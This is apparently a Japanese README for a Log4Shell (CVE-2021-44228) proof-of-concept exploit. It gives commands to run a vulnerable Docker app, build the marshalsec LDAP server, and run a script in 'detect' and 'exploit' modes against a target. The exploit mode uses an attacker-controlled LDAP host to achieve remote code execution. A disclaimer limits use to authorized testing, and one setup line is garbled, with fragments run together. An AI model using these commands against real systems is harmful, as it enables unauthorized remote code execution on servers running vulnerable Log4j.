
Log4Shell CVE-2021-44228 PoC
(CVE-2021-44228)
Apache Log4j ≤ 2.14.1 の重大な脆弱性 Log4Shell に対するテストエクスプロイト。JNDI インジェクションを介してリモートコード実行を可能にします。
⚠️ この PoC は教育目的および許可された環境での管理されたテストのみを対象としています。 明示的な許可なくシステムに対して使用しないでください。
marshalsecpython3 -m http.server)脆弱アプリを実行:
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
アクセス: http://localhost:8080
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
python3 main.py -u http://target.com -i burp.collab.net -m detect
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit